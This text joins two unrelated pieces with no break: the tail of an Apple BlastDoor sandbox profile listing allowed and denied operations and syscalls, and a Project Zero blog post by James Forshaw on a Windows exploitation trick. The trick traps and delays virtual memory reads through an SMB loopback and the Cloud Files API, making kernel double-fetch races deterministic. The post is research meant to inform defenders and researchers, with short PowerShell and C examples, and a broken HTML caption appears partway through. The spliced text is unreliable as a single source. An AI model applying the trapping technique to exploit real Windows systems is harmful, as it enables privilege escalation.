       (global-name "com.apple.logd")

       (global-name "com.apple.system.DirectoryService.libinfo_v1")

       (global-name "com.apple.system.logger")

       (global-name "com.apple.system.notification_center"))

;; Allow mostly harmless operations.

(allow signal process-info-dirtycontrol process-info-pidinfo

       (target self))

;; Temporarily allow sysctl-read with reporting to see if this is

;; used for anything.

(allow (with report) sysctl-read)

;; We don't need to post any darwin notifications.

(deny darwin-notification-post)

;; We shouldn't allow any other file operations not covered under

;; the default of deny above.

(deny file-clone file-link)

;; Don't deny file-test-existence: <rdar://problem/59611011>

;; (deny file-test-existence)

;; Don't allow access to any IOKit properties.

(deny iokit-get-properties)

(deny mach-cross-domain-lookup)

;; Don't allow BlastDoor to spawn any other XPC services other than

;; ones that we can intentionally whitelist later.

(deny mach-lookup (xpc-service-name-regex #".*"))

;; Don't allow any commands on sockets.

(deny socket-ioctl)

;; Denying this should have no ill effects for our use case.

(deny system-privilege)

;; To be uncommented once the system call whitelist is complete...

;; (deny syscall-unix (with send-signal SIGKILL))

(allow syscall-unix

       (syscall-number SYS_exit)

       (syscall-number SYS_kevent_qos)

       (syscall-number SYS_kevent_id)

       (syscall-number SYS_thread_selfid)

       (syscall-number SYS_bsdthread_ctl)

       (syscall-number SYS_kdebug_trace64)

       (syscall-number SYS_getattrlist)

       (syscall-number SYS_sigsuspend_nocancel)

       (syscall-number SYS_proc_info)

       

       (syscall-number SYS___disable_threadsignal)

       (syscall-number SYS___pthread_sigmask)

       (syscall-number SYS___mac_syscall)

       (syscall-number SYS___semwait_signal_nocancel)

       (syscall-number SYS_abort_with_payload)

       (syscall-number SYS_access)

       (syscall-number SYS_bsdthread_create)

       (syscall-number SYS_bsdthread_terminate)

       (syscall-number SYS_close)

       (syscall-number SYS_close_nocancel)

       (syscall-number SYS_connect)

       (syscall-number SYS_csops_audittoken)

       (syscall-number SYS_csrctl)

       (syscall-number SYS_fcntl)

       (syscall-number SYS_fsgetpath)

       (syscall-number SYS_fstat64)

       (syscall-number SYS_fstatfs64)

       (syscall-number SYS_getdirentries64)

       (syscall-number SYS_geteuid)

       (syscall-number SYS_getfsstat64)

       (syscall-number SYS_getgid)

       (syscall-number SYS_getrlimit)

       (syscall-number SYS_getuid)

       (syscall-number SYS_ioctl)

       (syscall-number SYS_issetugid)

       (syscall-number SYS_lstat64)

       (syscall-number SYS_madvise)

       (syscall-number SYS_mmap)

       (syscall-number SYS_munmap)

       (syscall-number SYS_mprotect)

       (syscall-number SYS_mremap_encrypted)

       (syscall-number SYS_open)

       (syscall-number SYS_open_nocancel)

       (syscall-number SYS_openat)

       (syscall-number SYS_pathconf)

       (syscall-number SYS_pread)

       (syscall-number SYS_read)

       (syscall-number SYS_readlink)

       (syscall-number SYS_shm_open)

       (syscall-number SYS_socket)

       (syscall-number SYS_stat64)

       (syscall-number SYS_statfs64)

       (syscall-number SYS_sysctl)

       (syscall-number SYS_sysctlbyname)

       (syscall-number SYS_workq_kernreturn)

       (syscall-number SYS_workq_open)

)

;; Still allow the system call but report in log.

(allow (with report) syscall-unix)

;; For validating the entitlements of clients. This is so only entitled

;; clients can pass data into a BlastDoor instance.

(allow process-info-codesignature)

;;; -------------------------------------------------------------------------------------------- ;;;

;;; Reading Files

;;; -------------------------------------------------------------------------------------------- ;;;

;; Support for BlastDoor receiving sandbox extensions from clients to either read files, or

;; write to a target location.

;; com.apple.app-sandbox.read

(allow file-read*

       (extension "com.apple.app-sandbox.read"))

;; com.apple.app-sandbox.read-write

(allow file-read* file-write*

       (extension "com.apple.app-sandbox.read-write"))

Windows Exploitation Tricks: Trapping Virtual Memory Access

Posted by James Forshaw, Project Zero

This blog is a continuation of my series of Windows exploitation tricks. This one describes an exploitation trick I’ve been trying to develop for years, succeeding (mostly, more on that later) on the latest versions of Windows 10. It’s a trick to trap access to virtual memory, get feedback when it occurs and delay access indefinitely. The blog will go into some of the background for why this technique is useful, an overview of the research I did to find the trick as well as an overview of the types of vulnerabilities it can be used with.

Background

When would you need such an exploitation trick? A good example of the types of security vulnerabilities which can benefit can be found in the seminal Bochspwn research by Mateusz Jurczyk and Gynvael Coldwind. The research showed a way of automating the discovery of memory double-fetches in the Windows kernel.

If you’ve not read the paper, a double-fetch is a type of Time-of-Check Time-of-Use (TOCTOU) vulnerability where code reads a value from memory, such as a buffer length, verifies that value is within bounds and then rereads the value from memory before use. By swapping the value in memory between the first and second fetches the verification is bypassed which can lead to security issues such as privilege escalation or information disclosure. The following is a simple example of a double fetch taken from the original paper.

DWORD* lpInputPtr = // controlled user-mode address

UCHAR  LocalBuffer[256];

 

if (*lpInputPtr > sizeof(LocalBuffer)) { ①

  return STATUS_INVALID_PARAMETER;

}

RtlCopyMemory(LocalBuffer, lpInputPtr, *lpInputPtr);②

This code copies a buffer from a controlled user mode address into a fixed sized stack buffer. The buffer starts with a DWORD size value which indicates the total size of the buffer. Memory corruption can occur if the size value pointed to by lpInputBuffer changes between the first read of the size value to compare against the buffer size ① and the second read of the size when copying into the buffer ②. For example, if the first time the value is read it’s 100 and the second it’s 400 then the code will pass the size check as 100 is less than 256 but will then copy 400 bytes into that buffer corrupting the stack.

Once a vulnerability such as this example was discovered Mateusz and Gynvael needed to exploit it. How they achieved exploitation is detailed in section 4 of the paper. The exploit techniques that were identified were all probabilistic. Exploitation typically required two threads racing each other, with one reading and one writing. The probabilistic nature of success is due to the probability that in between the first read from a memory location and the second read the writing thread sets a new value which exploits the vulnerability.

To widen the TOCTOU window many of the techniques described abuse the behavior of virtual memory on Windows. A process on Windows can typically access a large virtual memory region up to 8TiB size. This size is likely to be significantly larger than the physical memory in the system, especially considering the limit is per-process, not per-system. Therefore to maintain the illusion of such a large memory address space the kernel uses on-demand memory paging.

When memory is allocated in the process the CPU’s page tables are set up to indicate the presence of the memory region but are marked as invalid. At this point the virtual memory region has been allocated but there is no physical memory backing it. When the process tries to access that memory region the CPU will generate an exception, generally referred to as a page-fault, which is handled by the kernel.

The kernel can look up the memory address which was accessed to cause the page-fault and try and fix the address. How the page-fault is fixed depends on the type of memory access. A simple example is if the memory was allocated but not yet used the kernel will get a physical memory page, initialize it to zeros then adjust the page tables to map that new physical memory page at the faulting address. Once the page-fault has been fixed the faulting thread can be restarted at the instruction which accessed the memory and the memory access should now succeed as if it was always present.

A more complex scenario is if the page is part of a memory mapped file. In this case the kernel will need to request that the page’s data is read back from disk before it can satisfy the page-fault. This can take quite a long time, at least for spinning rust disks, so it might require the faulting thread to be suspended while it waits for the page to be read. Once the page has been read the memory can be fixed up, the original thread can be resumed and the thread restarted at the faulting instruction.

Overview diagram of page fault causing access to the file system. A user application is shown reading memory from a file mapped into memory. When the memory read occurs a page fault is generated in the kernel. As the memory is part of a file mapping this calls into the IO Manager which then requests the file data from the file system. The read data is then returned back through the kernel to satisfy the page fault and the user application can complete the memory read.

The end result is it can take a significant amount of time, relative to a CPU’s native speed that is, to handle a page-fault. However, abusing these virtual memory behaviors only widens the TOCTOU window, it didn’t allow for precise timing to swap values in memory. The result is the exploitation techniques still came with limitations. For example, it was very slow if not impossible in some cases to exploit on a machine with a single CPU core as it relies on having concurrent threads reading and writing.

An ideal exploit primitive would be one where the exploitation window can be made arbitrarily large so that it becomes trivial to win the race. Taking previous experience and knowledge of existing bug classes my ideal primitive would be one which meets a set of criteria:

  • Works on a default installation of Windows 10 20H2.
  • Gives a clear signal when memory is read or written.
  • Works when memory is accessed from both user and kernel mode.
  • Allows for delaying memory access indefinitely.
  • The data in the memory accessed is arbitrary.
  • The primitive can be set up from a range of privilege levels.
  • Can trap multiple times during the same exploit.

While meeting all these criteria would be ideal, there’s no guarantee we’ll meet all or any of them. If we only meet some then the range of exploitation vulnerabilities might be limited. Let’s start with a quick overview of the existing work which might give us an idea of how to proceed to find a primitive.

Existing Work

Having spoken to Mateusz and made an effort to look for any subsequent work there seems to be little novel work over and above the original Bochspwn paper on the exploitation of these types of TOCTOU issues. At least this is true for exploitation on Windows, however, novel techniques have been developed on other platforms, specifically Linux. Both of these techniques rely on the behavior of virtual memory I previously described.

The first technique in Linux makes use of Userfault File Descriptor (userfaultfd) to get notifications when page-faults occur in a process. With userfaultfd enabled a secondary thread in the process can read a notification and handle the page-fault in user mode. Handling the fault could be mapping memory at the appropriate location or changing page protection. The key is the faulting thread is suspended until the page-fault is handled by another thread. Therefore if a kernel function accessed the memory the request will be trapped until it's completed. This allows for a primitive where the memory access can be delayed indefinitely as well as having a timing signal for the access. Using userfaultfd also allows the fault to be distinguished between read and write faults as the memory page can be write-protected

Using userfaultdd works for in-process access such as from the kernel, but is not really useful if the code accessing the memory is in another process. To solve that problem you can use the FUSE file system as Jann Horn demonstrated in a previous Project Zero blog post. A FUSE file system is implemented entirely in user mode, but any requests for the file go through the Linux kernel’s Virtual File System APIs. As a file is accessed as if it was implemented by an in-kernel file system it’s possible to map that file into memory using mmap. When a page-fault occurs on a FUSE backed memory region a request will be made to the user-mode file system daemon which can delay the read or write request indefinitely.

Remote File Systems

As far as I can tell there’s nothing equivalent to Linux’s userfaultd on Windows. One feature which caught my eye was memory write watches. But those seem to just allow an application to query if memory had been written to since the last time it was checked and doesn’t allow memory writes to be trapped.

If we can’t just trap page-faults to virtual memory what about mapping a file on a user-mode filesystem like FUSE? Unfortunately there is no built-in FUSE driver in Windows 10 (yet?), but that doesn’t mean there’s no mechanism to implement a file system in user-mode. There are some efforts to make a real FUSE on Windows, such as the WinFsp project, but I’d expect the chances of them being installed on a real system to be vanishingly small.

The first thought I had was to try to exploit Multiple UNC Provider (MUP) clients. When you access a file via a UNC path, e.g. \\server\share\file.bin, this will be handled by a MUP driver in the kernel, which will pass it to one of the registered client drivers. As far as the kernel is concerned the opened file is a regular file (with some caveats) which generally means the file can be mapped into memory. However, any requests for the contents of that file will not be handled directly, but instead handled by a server over a network protocol.

Ideally we should be able to implement our own server, handle the read or write requests to a file mapping which will allow us to detect or delay the request so that we can exploit any TOCTOU. The following table contains only Microsoft MUP drivers that I identified. The table contains what versions of Windows 10 the driver is supported on and whether it’s something enabled by default.

Remote File System

Supported Version

Default?

SMB

Everything

Yes (SMBv1 might be disabled)

WebDAV

Everything

Yes (except Server SKUs)

NFS

Everything

No

P9

Windows 10 1903

No (needs WSL)

Remote Desktop Client

Everything

Yes

While MUP was designed for remote file systems there’s no requirement that the file system server is actually remote. SMB, WebDAV and NFS are IP based protocols and can be redirected to localhost. P9 uses a local Unix Socket which can’t be remoted anyway. The terminal services client sends file access requests back to the client system over the RDP protocol. For all these protocols we can implement the server with varying degrees of effort and see if we can detect and delay reads and writes to the file mapping.

I decided to focus only on two, SMB and WebDAV. These were the only two which are enabled by default and are trivially usable. While the Remote Desktop Client is in theory installed by default the RDP server is not normally enabled by default. Also setting up the RDP session is complex and might require valid authentication credentials therefore I decided against it.

Server Message Block

SMB is almost as old as Windows itself, having been introduced in Lan Manager 1.0 back in 1987. The latest SMB version 3.1 protocol only bears a passing resemblance to that original version having shed its NetBIOS roots for a TCP/IP connection. Its lineage does mean it’s the best integrated of any of the network file systems, with the MUP APIs being designed around the needs of SMB.

I decided to do a simple test of the behavior of mapping a file over SMB. This is fairly easy as you can access SMB on the same machine via localhost. I first created a 1GiB file on a local disk, the rationale being if SMB supports caching file data it’s unlikely to read something that large in one go. I then started Wireshark and monitored the loopback interface to capture the SMB traffic as shown below.

Overview diagram of SMB test with wireshark in place to inspect the network traffic from the SMB client to the SMB server. The diagram starts overview with a user application reading memory of a mapped file which causes a page fault. As the file is on an SMB share this calls into the SMB client which sends a request to the SMB server and from there to the file system. In between the SMB client and SMB server components the Wireshark logo indicates where we are monitoring the network traffic.

I then wrote a quick PowerShell script which will map the file into memory and then reads a few bytes from memory at a few different offsets.

Use-NtObject($f = Get-NtFile "\\localhost\c$\root\file.bin" -Win32Path) {

    Use-NtObject($s = New-NtSection -File $f -Protection ReadWrite) {

        Use-NtObject($m = Add-NtSection -Section $s -Protection ReadWrite) {

            $m.ReadBytes(0, 4)

            $m.ReadBytes(256*1024*1024, 4)

            $m.ReadBytes(512*1024*1024, 4)

            $m.ReadBytes(768*1024*1024, 4)

        }

    }

}

This just reads 4 bytes from offset, 0, 256MiB, 512MiB and 768MiB. Going back to Wireshark I filtered the output to only SMBv2 read requests using the display filter smb2.cmd == 8, and the following four packets can be observed.

Read Request Len:32768 Off:0 File: root\file.bin

Read Request Len:32768 Off:268435456 File: root\file.bin

Read Request Len:32768 Off:536870912 File: root\file.bin

Read Request Len:32768 Off:805306368 File: root\file.bin 

This corresponds with the exact memory offsets we accessed in the script although the length is always 32KiB in size, not the 4 we requested. Note, that it’s not the typical Windows memory allocation granularity of 64KiB which you might expect. In my testing I’ve never seen anything other than 32KiB requested.

All the bytes we’ve tested are aligned to the 32KiB block, what if the bytes were not aligned, for example if we accessed 4 bytes from address 512MiB minus 2? Changing the script to add the following allows us to check the behavior:

$m.ReadBytes(512*1024*1024 - 2, 4)

In Wireshark we see the following read requests.

Read Request Len:32768 Off:536838144 File: root\file.bin

Read Request Len:32768 Off:536870912 File: root\file.bin

The accesses are still at 32KiB boundaries, however as the request straddles two blocks the kernel has fetched the preceding 32KiB of data from the file and then the following 32KiB. You might think that all makes sense, however this behavior turned out to be a fluke of testing.

</span><span class=Overview diagram of memory read layout. In the middle is a set of boxes representing the native 4KiB pages being read. All the boxes are contained within a single larger region which is the large page size. Above the boxes are arrows which show that from the base of the 4KiB box a 32KiB read will be made into the file which can satisfy the reads from other 4KiB pages. The final box shows that the last 32KiB of the large page size will always be read as a single page regardless of where in the box the read occurs." style="max-height: 750; max-width: 600;" />

The diagram above shows the structure of how mapped file reads are handled. When an address is read the kernel will request 32KiB from the closest 4KiB page boundary, not the 32KiB boundary. However, there’s then a secondary structure on top based on the supported size of large pages. If the read is anywhere within 32KiB of the end of a large page the read offset is always for the last 32KiB.

For example, on my system the large page size (as queried using the GetLargePageMinimum API) is 2MiB. Therefore if you start at offset 512MiB, between 512 and 514 - 32KiB the kernel will read 32KiB from the offset truncated to the closest 4KiB boundary. Between 514 - 32KiB and 514MiB the read will always request offset 514 - 32KiB so that the 32KiB doesn’t cross the large page boundary.

This allows reads at 4KiB boundaries, however the amount of data read is still 32KiB. This means that once one 4KiB page is accessed the kernel will populate the current page and 7 following pages. Is there any way to only populate a single native page? Based on a comment from Mateusz I tested returning short reads. If the SMB server returns fewer bytes than requested from the read then rather than failing it only populates the pages covered by the read. By returning these short reads we can get trap granularity down to the native page size except for the final 32KiB of a large page. If a read request is shorter than the native page size the rest of the page is zeroed.

What about writing? Let’s change the script again to call WriteBytes rather than ReadBytes, for example:

$m.WriteBytes(256*1024*1024, @(0xAA, 0xBB, 0xCC, 0xDD))

You will see a write request to the file in Wireshark, similar to the following:

Write Request Len:4096 Off:268435456 File: root\file.bin

However, if you dig a bit deeper you’ll notice that the write only happens once the file is closed, not in response to the WriteBytes call. This makes sense, there isn’t any easy way to detect when the write happened to force the page to be flushed back to the file system. Even if there was a way flushing to a network server for every write would have a massive performance impact.

All is not lost however, before the memory is safe to write it must be populated with the contents from the file. Therefore if you look before the write you’ll see a corresponding read request for the 32KiB region which encompasses the write location which is synchronous with the read. You can detect a write through its corresponding read but you can’t distinguish read from a write at the protocol level.

All this testing indicates if we have control over the server we can detect memory access to the mapped file. Can we delay the access as well? I wrote a simple SMB server in .NET 5 using the SMBLibrary by Tal Aloni. I implemented the server with a custom filesystem handler and added some code to the read path which delays for 10 seconds when the file offset is greater than 512MiB.

if (Position >= (512 * 1024 * 1024)) {

    Console.WriteLine("====> Delaying at Position {0:X}", Position);

    Thread.Sleep(10000);

    Console.WriteLine("====> Continuing.");

}

The data returned by the read operation can be arbitrary, you just need to fill in the appropriate byte buffers in the read. To test the access times I wrapped the memory read requests inside a Measure-Command call to time the memory access.

Measure-Command { $m.ReadBytes(512*1024*1024 - 4, 4) }

Measure-Command { $m.ReadBytes(512*1024*1024 - 4, 4) }

Measure-Command { $m.ReadBytes(512*1024*1024, 4) }

Measure-Command { $m.ReadBytes(512*1024*1024, 4) }

To compare the access time a read request is made to a location 4 bytes below the 512MiB boundary and then at the 512MiB boundary. By making two requests we should be able to see if the results differ per-read. The results were as follows:

# Below 512MiB (Request 1)

Days              : 0

Hours             : 0

Minutes           : 0

Seconds           : 1

Milliseconds      : 25

...

# Below 512MiB (Request 2)

Days              : 0

Hours             : 0

Minutes           : 0

Seconds           : 0

Milliseconds      : 1

...

# Above 512MiB (Request 1)

Days              : 0

Hours             : 0

Minutes           : 0

Seconds           : 10

Milliseconds      : 358

...

# Above 512MiB (Request 2)

Days              : 0

Hours             : 0

Minutes           : 0

Seconds           : 0

Milliseconds      : 1

...

The first access for below 512MiB takes around a second, this is because the request still needs to be made to the server and the server is written in .NET which can have a slow startup time for running new code. The second request takes significantly less that 1 second, the memory is now cached locally and so there doesn’t need to be any request.

For the accesses above 512MiB the first request takes around 10 seconds, which correlates with the added delay. The second request takes less than a second because the page is now cached locally. This is exactly what we’d expect, and proves that we can at least delay for 10 seconds. In fact you can delay the request at least 60 seconds before the connection is forcibly reset. This is based on the session timeout for the SMB client. You can query the SMB client timeout using the following command in PowerShell:

PS> (Get-SmbClientConfiguration).SessionTimeout

60

A few things to note about the SMB client’s behavior which came out of testing. First the client or the Windows cache manager seem to be able to do some caching of the remote file. If you request a specific access when opening the file, such as GENERIC_READ | GENERIC_WRITE for the desired access then caching is enabled. This means the read requests do not go to the server if they’re previously been cached locally. However if you specify MAXIMUM_ALLOWED for the desired access the caching doesn’t seem to take place. Secondly, sometimes parts of the file will be pre-cached, such as the first and last 32KiB of the file. I’ve not worked out what is the cause, oddly it seems to happen more often with native code than .NET code, so perhaps it’s Windows Defender peeking at memory or perhaps Superfetch. In general as long as you keep your memory accesses somewhere in the middle of a large file you should be safe.

If you’ve run the example code you might notice a problem, running the example server locally fails with the following error:

System.Net.Sockets.SocketException (10013): An attempt was made to access a socket in a way forbidden by its access permissions.

By default Windows 10 has the SMB server enabled. This takes over the TCP ports and makes them exclusive so it’s not possible to bind to them from a normal user. It is possible to disable the local SMB server, but that would require administrator privileges. Still, it was worth verifying whether the SMB server approach will work even if we have to communicate with a remote server.

I did do some investigation into tricks I could use to get the built-in SMB server to work for our purposes. For example I tried to use the fact that you can set an Opportunistic Lock which will trap file reads. I used this trick to exploit a TOCTOU vulnerability in the LUAFV driver. Unfortunately the SMB server detects the file is already in a lock and waits for the OpLock break to occur before allowing access to the file. This made it a non-starter.

For testing you can disable the LanmanServer service and its corresponding drivers. If you wanted to use this on an arbitrary system you'd almost certainly need to connect to a remote server. I’ve released the example server code here, which can be repurposed, although it is only a demonstrator. It allows for read granularity of the native page size, which is assumed to be 4KiB. The server code should work on Linux but as of version 1.4.3 of SMBLibrary on NuGet there’s a bug which causes the server to fail when starting. There is a fix in the github repository but at the time of writing there’s no updated package.

How well does abusing the SMB client meet with our criteria from earlier? I’ve crossed out all the ones we’ve met.

  • Works on a default installation of Windows 10 20H2.
  • Gives a clear signal when memory is read or written.
  • Works when memory is accessed from both user and kernel mode.
  • Allows for delaying memory access indefinitely.
  • The data in the memory accessed is arbitrary.
  • The primitive can be set up from a range of privilege levels.
  • Can trap multiple times during the same exploit.

Using the SMB client does meet the majority of our criteria. I verified that it doesn’t matter whether kernel or user mode code accesses the memory it will still trap. The biggest problem is it’s hard to use this from a sandboxed application where it would perhaps be most useful. This is because MUP restricts access to remote file systems by default from restricted and low IL processes and AppContainer sandboxes need specific capabilities which are unlikely to be granted to the majority of applications. That’s not to say it’s completely impossible but it’d be hard to do.

While our trick doesn’t really delay the memory read indefinitely, for our purposes the limit of 60 seconds based on the SMB session timeout is going to be enough for most vulnerabilities. Also once the trap has been activated you can’t force the memory manager to request the same page from the server. I tried playing with memory caching flags and direct IO but at least for files over SMB nothing seemed to work. However, you can specify your own base address when mapping a file so you could map different offsets in the file to the same virtual address by unmapping the original and mapping in a new copy. This would allow you to use the same address multiple times.

WebDAV

As SMB can’t be easily used locally, what about WebDAV? By default TCP port 80 is unused on Windows 10 so we can start our own web server to communicate with. Also unlike on Linux there’s no requirement for having administrator privileges to bind to TCP ports under 1024. Even if either of these were not the case the WebDAV client supports a syntax to specify the TCP port of the server. For example if you use the path \\localhost@8080\share then the WebDAV HTTP connection will be made over port 8080.

However, does the WebDAV client expose the right read and write primitives to allow us to trap on memory access? I wrote a simple WebDAV server using the NWebDav library to serve local files. Running the script but specifying the WebDAV server on port 8080 to open the 1GiB file I’m immediately faced with a problem:

Get-NtFile : (0xC0000904) - The file size exceeds the limit allowed and cannot be saved.

Just opening the file fails with the error code STATUS_FILE_TOO_LARGE. The reason for that can be found in one of many Microsoft Knowledge Base articles such as this one. There’s a default limit of 50MB (that’s decimal megabytes) for any file accessed on a WebDAV share because it used to be possible to cause a denial of service by tricking a Windows system into downloading an arbitrarily large file.

The reason this size limiting behavior is in place is why WebDAV isn’t suitable for this attack. If you resize the file to below 50MB you’ll find the WebDAV client pulls the file in its entirety to the local disk before returning from the file open call. That file is then mapped into memory as a local file. The WebDAV server never receives a GET or PUT request for reads/writes to the memory mapping synchronously so there’s no mechanism to detect or trap specific memory requests.

File System Overlay APIs

Abusing the SMB client does work, but it can’t be used locally on a default installation. I decided I need to look for another approach. As I was looking at Windows Filter Drivers (see last blog post) I noticed a few of the drivers provided a mechanism to overlay another file system on top of an existing one. I trawled through MSDN to find the API documentation to see if anything would be suitable. The three I looked at are shown in the table below.

File system

Supported Version

Default?

Projected File System

Windows 10 1809

No

Windows Overlay (WOF)

Everything

Yes

Cloud Files API

Windows 10 1709

Yes (except non-Desktop Server SKUs)

By far the most interesting one is the Projected File System. This was developed by Microsoft to provide a virtual file system for GIT. It allows placeholder files to be “projected” into a directory on disk and the contents of those files are only “rehydrated” to a full file on demand. In theory this sounds ideal, as long as it would populate the file’s contents piecemeal we could add the delays when receiving the PRJ_GET_FILE_DATA_CB callback.

However a basic implementation based on Microsoft’s ProjectedFileSystem sample code would always rehydrate the entire file during file open, similar to WebDAV. Perhaps there’s an option I missed to stream the contents rather than populate it in one go but I couldn’t find it immediately. In any case the Projected File System is not installed by default making it less useful.

WOF doesn’t really allow you to implement your own file system semantics. Instead it allows you to overlay files from either a secondary Windows Image File (WIM) or compressed on the same volume. This really doesn’t give us the control we’re looking for, you might be able to finagle something to work but it seems a lot of effort.

That leaves us with the Cloud Files API. This is used by OneDrive to provide the local online filesystem but is documented and can be used to implement any file system overlay you like. It works very similar to the Projected File System, with placeholders for files and the concept of hydrating the file on demand. The contents of the files do not need to come from any online service such as OneDrive, it can all be sourced locally. Crucially after some basic testing it supports streaming the contents of the file based on what was being read and you could delay the file data requests and the reading thread would block until the read has been satisfied. This can be enabled by specifying the CF_HYDRATION_POLICY_PRIMARY hydration policy with the value CF_HYDRATION_POLICY_PARTIAL when configuring the base sync root. This allows the Cloud File API to only hydrate the file's parts which were accessed.

This seemed perfect, until I tested with the PowerShell file mapping script where it didn’t work, my cloud file provider would always be requested to provide the entire file. Checking the Cloud Filter driver, when a request is received for mapping a placeholder file, the IRP_MJ_ACQUIRE_FOR_SECTION_SYNCHRONIZATION handler always fully rehydrates the file before completing. If the file is not hydrated fully then the call to NtCreateSection never returns which prevents the file being mapped into memory.

I was going to go back to doing my filter research until I realized I might be able to combine the SMB client loopback with the Cloud Filter API. I already knew that the SMB client doesn’t really map a file, even locally, instead it would read it on-demand via the SMB protocol. And I also knew that the Cloud Filter API would allow streaming of parts of the file on-demand as long as the file wasn’t being mapped into memory. The final setup is shown in the following diagram:

Overview of the operation of the exploitation trick. Memory is read by the application from a mapped file, which causes a page fault. That then requests the contents of the file to be pulled over SMB which goes to the local Cloud Filter Driver and back to the original application where the read is handled.

To use the primitive we first setup our own cloud provider by registering the sync root directory using the CfRegisterSyncRoot API configuring it with the partial hydration policy. Then a 1GiB placeholder can be created in the directory using CfCreatePlaceholders. At this point the file does not have any contents on disk. If we now open and map the placeholder file via the SMB loopback client the file will not be rehydrated immediately.

Any memory access into the mapping will cause the SMB client to make a request for a 32KiB block, which will be passed to our user-mode cloud provider, which we can detect and delay as necessary. It goes without saying that the contents of the file can also be arbitrary. Based on testing it doesn’t seem like you can force the read granularity down to the native page size like when implementing a custom SMB server, however you can still make requests at native page size boundaries within the large page size constraint. It might be possible to modify the file size to trick the SMB server into doing short reads but this behavior has not been tested. A sample implementation of the cloud provider is available here.

Usage Examples

We now have an exploitation trick which allows us to trap and delay virtual memory reads and writes. The big question is, does this improve the exploitation of vulnerabilities such as double fetches? The answer depends on the actual vulnerability. A quick note, when I use the word page I’m meaning the unit of memory which will cause a request to the SMB server, e.g. 32KiB not the native page size such as 4KiB.

Let’s take the example given at the start of this blog post. This vulnerability reads the value from the same memory address, lpInputPtr, twice. First for the comparison, then for the size to copy.  The problem for exploitation is one of the limitations of the technique is the memory trap is one shot. Once the trap has fired to read the size for the comparison you can delay it indefinitely. However, once you provide the requested memory page and the faulting thread is resumed it won’t fire on the second read, it’ll just be read from memory as if it was always there.

You might wonder if you could remap the memory page when you detect the first read? Unfortunately this doesn’t work. When the thread is resumed it restarts at the faulting instruction and will perform the read again, therefore what would happen is the following:

Directory graph showing states of the double fetch. ① Read Size from Pointer -> ② Page Fault -> ③ Remap Page -> ④ Resume Thread -> Back to ①

As you can tell from the diagram you end up trapped in an infinite loop, as you remap a fresh page which just triggers another page fault ad infinitum. If you don’t perform step ③ then the operation will complete and there is a time window between resuming the thread, reading the now valid memory for the size comparison and the second read. However, in this example the time window is likely to be the order of a couple of instructions so using our exploitation trick isn’t better than the existing probabilistic approaches. That said one advantage is you do know when the read occurs which allows you to target the brute force window more accurately.

This example is the worst case, what if there was more time between the reads? Another example from a the Bochspwn paper is shown below:

PDWORD BufferSize = // controlled user-mode address

PUCHAR BufferPtr  = // controlled user-mode address

PUCHAR LocalBuffer;

 

LocalBuffer = ExAllocatePool(PagedPool, *BufferSize);①

if (LocalBuffer != NULL) {

  RtlCopyMemory(LocalBuffer, BufferPtr, *BufferSize);②

} else {

  // bail out

}

The same double fetch behavior is present, however what’s different is the value is passed to another function, in this case ExAllocatePool which allocates kernel memory. Depending of the current memory configuration or how large the allocation requested there might be a significant time delay between ① and ②. Is there any way we can win the race?

Well not that I know of, at least not deterministically. But we can exploit one behavior to try to synchronize the reading and writing threads a little. Recall that in order to write to an unresolved page the contents of the page must first be read from the server. Therefore, to maintain consistency any thread writes to the unresolved page must generate a page fault and wait on the same lock as another thread which is just reading from the page, as shown in the following diagram:

Diagram showing separate read and write threads accessing the same pointer, one for read and one for write. When the page fault occurs both threads enter the same lock and they are both resumed once the lock is released.

By synchronizing the reading and writing threads you’re giving yourself a reasonable chance of causing a write to happen during the time window for exploitation. This is still a probabilistic approach, it depends on the scheduler. For example, it’s possible that the write thread is woken before the read thread which will cause the pointer to always take the final value. Or the read thread could run to completion before the write thread is ever scheduled to run making the value never change. It’s possible there’s some scheduler magic such as using multiple reader or writer threads or by selecting appropriate priorities which you could exploit to guarantee read and write ordering. I’d be surprised if something is reliable across multiple Windows 10 systems. I’d be very interested in anyone who’s got better ideas on how to improve the reliability of this.

One approach you might be wondering about is unaligned access, say splitting the value across two separate pages. From a microarchitecture perspective it’s likely that the read will be split up into two parts, first touching one page then another. However, remember how the page fault works, it generates an exception which causes a handler to execute in the kernel. At this point any work the instruction has already done will have been retired while the kernel deals with the page fault. When the thread is resumed it will restart the faulting instruction, which will reissue the appropriate micro operations to read from the unaligned address. Unless the compiler generated two loads for the unaligned access (which might happen on some architectures) then there is no way I know of to restart the memory access instruction part of the way through.

This all seems slightly downbeat on the usefulness of the exploitation trick. Thing is, there’s as many different types of vulnerability as there are fish in the sea (if you’re reading this in 2100, I apologize for the acidification of the seas which killed all marine life, choose your own apocalypse-appropriate proverb instead). For example if we modify the original example as follows:

PDWORD lpInputPtr = // controlled user-mode address

UCHAR  LocalBuffer[256];

 

if (lpInputPtr[0] > sizeof(LocalBuffer) || lpInputPtr[1] != 2) {

  return STATUS_INVALID_PARAMETER;

}

RtlCopyMemory(LocalBuffer, lpInputPtr, *lpInputPtr);

The check now ensures the buffer is large enough and a second DWORD in the buffer is not set to 2. The second field might represent the buffer type, and type 2 isn’t valid for this request. If you check the compiler output for this code, such as on Godbolt, the difference in native code is 2 or 3 instructions. This would seem to not materially improve the odds of winning the TOCTOU race when using a naïve probabilistic approach. But with our exploitation trick we can now build a deterministic exploit.

Diagram showing access memory for the two reads which can generate a page fault which can allow us to modify the original size value. The central part of the diagram shows a previous page which only contains the Size field and the next page which contains the Type field and the rest of the structure.

The diagram above shows how we can achieve this deterministic exploit. We can place the Size field on a different page to the rest of the input buffer, although the buffer is still contiguous in virtual memory. The first page (N-1) should already be faulted into memory and contain the Size field which is smaller than the LocalBuffer size. We can let the read for the size ① complete normally.

Next the code will read the Type field which is on page N ②. This page isn’t currently in memory and so when it’s accessed a page fault will occur ③. This requires the kernel to read the contents from the file, which we can detect and delay. When the read is detected we have as long as we need to modify the Size field to contain a value larger than the LocalBuffer size ④. Finally we complete the read, which will restart the thread back at the Type field read instruction ⑤. The code can continue and will now read the overly large Size field and cause memory corruption.

The key takeaway is that if between the double fetch points the code touches any user mode memory under your control which is not the one being double fetched it should be possible to convert that into a deterministic exploit. It doesn’t matter if the target system only has a single CPU, what the scheduling algorithm is in the kernel, how many instructions are between the double fetch points or what day of the week it is etc, it should “just work”.

The followup blog post on double-fetch exploitation gives some figures for exploitability. The examples shown up to now, when the right timing window is chosen the chance of success can hit 100% after some number of seconds. However, as shown here we can get 100% reliability on some classes of the same bug, but in the best case this isn’t an improvement other than it being deterministic.

